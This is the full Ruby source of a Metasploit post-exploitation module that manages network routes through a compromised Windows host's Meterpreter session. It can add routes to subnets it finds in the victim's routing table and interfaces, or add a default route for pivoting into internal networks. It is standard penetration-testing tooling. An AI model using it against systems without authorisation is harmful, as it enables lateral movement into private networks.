metasploit-framework/modules/post/windows/manage/autoroute.rb

364 lines
12 KiB
Ruby

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class MetasploitModule < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Network Route via Meterpreter Session',
'Description' => %q{This module manages session routing via an existing
Meterpreter session. It enables other modules to 'pivot' through a
compromised host when connecting to the named NETWORK and SUBMASK.
Autoadd will search a session for valid subnets from the routing table
and interface list then add routes to them. Default will add a default
route so that all TCP/IP traffic not specified in the MSF routing table
will be routed through the session when pivoting. See documentation for more
'info -d' and click 'Knowledge Base'},
'License' => MSF_LICENSE,
'Author' =>
[
'todb',
'Josh Hale <jhale85446[at]gmail.com>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter']
))
register_options(
[
OptString.new('SUBNET', [false, 'Subnet (IPv4, for example, 10.10.10.0)', nil]),
OptString.new('NETMASK', [false, 'Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"', '255.255.255.0']),
OptEnum.new('CMD', [true, 'Specify the autoroute command', 'autoadd', ['add','autoadd','print','delete','default']])
], self.class)
end
# Backwards compatability: This was changed because the option name of "ACTION"
# is special for some things, and indicates the :action attribute, not a datastore option.
# However, this is a semi-popular module, though, so I'd prefer not to break people's
# RC scripts that set ACTION. Note that ACTION is preferred over CMD.
#
# TODO: The better solution is to use 'Action' and 'DefaultAction' info elements,
# but there are some squirelly problems right now with rendering these for post modules.
def route_cmd
if datastore['ACTION'].to_s.empty?
datastore['CMD'].to_s.downcase.to_sym
else
wlog("Warning, deprecated use of 'ACTION' datastore option for #{self.fullname}'. Use 'CMD' instead.")
datastore['ACTION'].to_s.downcase.to_sym
end
end
# Run Method for when run command is issued
def run
print_status("Running module against #{sysinfo['Computer']}")
case route_cmd()
when :print
print_routes()
when :add
if validate_cmd(datastore['SUBNET'],netmask)
print_status("Adding a route to %s/%s..." % [datastore['SUBNET'],netmask])
add_route(:subnet => datastore['SUBNET'], :netmask => netmask)
end
when :autoadd
autoadd_routes
when :default
add_default
when :delete
if datastore['SUBNET']
print_status("Deleting route to %s/%s..." % [datastore['SUBNET'],netmask])
delete_route(:subnet => datastore['SUBNET'], :netmask => netmask)
else
delete_all_routes()
end
end
end
def delete_all_routes
if Rex::Socket::SwitchBoard.routes.size > 0
routes = []
Rex::Socket::SwitchBoard.each do |route|
routes << {:subnet => route.subnet, :netmask => route.netmask}
end
routes.each {|route_opts| delete_route(route_opts)}
print_status "Deleted all routes"
else
print_status "No routes have been added yet"
end
end
# Identical functionality to command_dispatcher/core.rb, and
# nearly identical code
def print_routes
if Rex::Socket::SwitchBoard.routes.size > 0
tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "Active Routing Table",
'Prefix' => "\n",
'Postfix' => "\n",
'Columns' => [
'Subnet',
'Netmask',
'Gateway',
],
'ColProps' => {
'Subnet' => { 'MaxWidth' => 17 },
'Netmask' => { 'MaxWidth' => 17 },
})
ret = []
Rex::Socket::SwitchBoard.each { |route|
if (route.comm.kind_of?(Msf::Session))
gw = "Session #{route.comm.sid}"
else
gw = route.comm.name.split(/::/)[-1]
end
tbl << [ route.subnet, route.netmask, gw ]
}
print_line tbl.to_s
else
print_status "No routes have been added yet"
end
end
# Yet another IP validator. I'm sure there's some Rex
# function that can just do this.
def check_ip(ip=nil)
return false if(ip.nil? || ip.strip.empty?)
begin
rw = Rex::Socket::RangeWalker.new(ip.strip)
(rw.valid? && rw.length == 1) ? true : false
rescue
false
end
end
def cidr_to_netmask(cidr)
int = cidr.gsub(/\x2f/,"").to_i
Rex::Socket.addr_ctoa(int)
end
def netmask
case datastore['NETMASK']
when /^\x2f[0-9]{1,2}/
cidr_to_netmask(datastore['NETMASK'])
when /^[0-9]{1,3}\.[0-9]/ # Close enough, if it's wrong it'll fail out later.
datastore['NETMASK']
else
"255.255.255.0"
end
end
# Adds a route to the framework instance
def add_route(opts={})
subnet = opts[:subnet]
Rex::Socket::SwitchBoard.add_route(subnet, netmask, session)
end
# Removes a route to the framework instance
def delete_route(opts={})
subnet = opts[:subnet]
Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session)
end
# This function will exclude loopback, multicast, and default routes
#
# @subnet [string class] IPv4 subnet or address to check
# @netmask [string class] IPv4 netmask to check
#
# @return [true] If good to add
# @return [false] If not
def is_routable?(subnet, netmask)
if subnet =~ /^224\.|^127\./
return false
elsif subnet == '0.0.0.0'
return false
elsif netmask == '255.255.255.255'
return false
end
return true
end
# Search for valid subnets on the target and attempt
# add a route to each. (Operation from auto_add_route plugin.)
#
# @return [void] A useful return value is not expected here
def autoadd_routes
switch_board = Rex::Socket::SwitchBoard.instance
print_status("Searching for subnets to autoroute.")
found = false
session.net.config.each_route do | route |
next unless is_routable?(route.subnet, route.netmask)
if !switch_board.route_exists?(route.subnet, route.netmask)
begin
if Rex::Socket::SwitchBoard.add_route(route.subnet, route.netmask, session)
print_good("Route added to subnet #{route.subnet}/#{route.netmask} from host's routing table.")
found = true
else
print_error("Could not add route to subnet #{route.subnet}/#{route.netmask} from host's routing table.")
end
rescue ::Rex::Post::Meterpreter::RequestError => error
print_error("Could not add route to subnet #{route.subnet}/(#{route.netmask}) from host's routing table.")
print_error(error.to_s)
end
end
end
if !autoadd_interface_routes && !found # Check interface list for more possible routes
print_status("Did not find any new subnets to add.")
end
end
# Look at network interfaces as options for additional routes.
# If the routes are not already included they will be added.
#
# @return [true] A route from the interface list was added
# @return [false] No additional routes were added
def autoadd_interface_routes
switch_board = Rex::Socket::SwitchBoard.instance
found = false
session.net.config.each_interface do | interface | # Step through each of the network interfaces
(0..(interface.addrs.size - 1)).each do | index | # Step through the addresses for the interface
ip_addr = interface.addrs[index]
netmask = interface.netmasks[index]
next unless ip_addr =~ /\./ # Pick out the IPv4 addresses
next unless is_routable?(ip_addr, netmask)
subnet = get_subnet(ip_addr, netmask)
if subnet
if !switch_board.route_exists?(subnet, netmask)
begin
if Rex::Socket::SwitchBoard.add_route(subnet, netmask, session)
print_good("Route added to subnet #{subnet}/#{netmask} from #{interface.mac_name}.")
found = true
else
print_error("Could not add route to subnet #{subnet}/#{netmask} from #{interface.mac_name}")
end
rescue ::Rex::Post::Meterpreter::RequestError => error
print_error("Could not add route to subnet #{subnet}/(#{netmask}) from #{interface.mac_name}")
print_error(error.to_s)
end
end
end
end
end
return found
end
# Take an IP address and a netmask and return the appropreate subnet "Network"
#
# @ip_addr [string class] Input IPv4 Address
# @netmask [string class] Input IPv4 Netmask
#
# @return [string class] The subnet related to the IP address and netmask
# @return [nil class] Something is out of range
def get_subnet(ip_addr, netmask)
return nil if !validate_cmd(ip_addr, netmask) #make sure IP and netmask are valid
nets = ip_addr.split('.')
masks = netmask.split('.')
output = ""
(0..3).each do | index |
octet = get_subnet_octet(int_or_nil(nets[index]), int_or_nil(masks[index]))
return nil if !octet
output << octet.to_s
output << '.' if index < 3
end
return output
end
# Input an octet of an IPv4 address and the cooresponding octet of the
# IPv4 netmask then return the appropreate subnet octet.
#
# @net [integer class] IPv4 address octet
# @mask [integer class] Ipv4 netmask octet
#
# @return [integer class] Octet of the subnet
# @return [nil class] If an input is nil
def get_subnet_octet(net, mask)
return nil if !net || !mask
subnet_range = 256 - mask # This is the address space of the subnet octet
multi = net / subnet_range # Integer division to get the multiplier needed to determine subnet octet
return(subnet_range * multi) # Multiply to get subnet octet
end
# Take a string of numbers and converts it to an integer.
#
# @string [string class] Input string, needs to be all numbers (0..9)
#
# @return [integer class] Integer representation of the number string
# @return [nil class] string contains non-numbers, cannot convert
def int_or_nil(string)
num = string.to_i
num if num.to_s == string
end
# Add a default route to the routing table
#
# @return [void] A useful return value is not expected here
def add_default
subnet = '0.0.0.0'
mask = '0.0.0.0'
switch_board = Rex::Socket::SwitchBoard.instance
print_status("Attempting to add a default route.")
if !switch_board.route_exists?(subnet, mask)
begin
if Rex::Socket::SwitchBoard.add_route(subnet, mask, session)
print_good("Route added to subnet #{subnet}/#{mask}")
else
print_error("Could not add route to subnet #{subnet}/#{mask}")
end
rescue ::Rex::Post::Meterpreter::RequestError => error
print_error("Could not add route to subnet #{subnet}/(#{mask})")
print_error(error.to_s)
end
end
end
# Validates the command options
def validate_cmd(subnet=nil,netmask=nil)
if subnet.nil?
print_error "Missing subnet option"
return false
end
unless(check_ip(subnet))
print_error "Subnet invalid (must be IPv4)"
return false
end
if(netmask and !(Rex::Socket.addr_atoc(netmask)))
print_error "Netmask invalid (must define contiguous IP addressing)"
return false
end
if(netmask and !check_ip(netmask))
print_error "Netmask invalid"
return false
end
true
end
end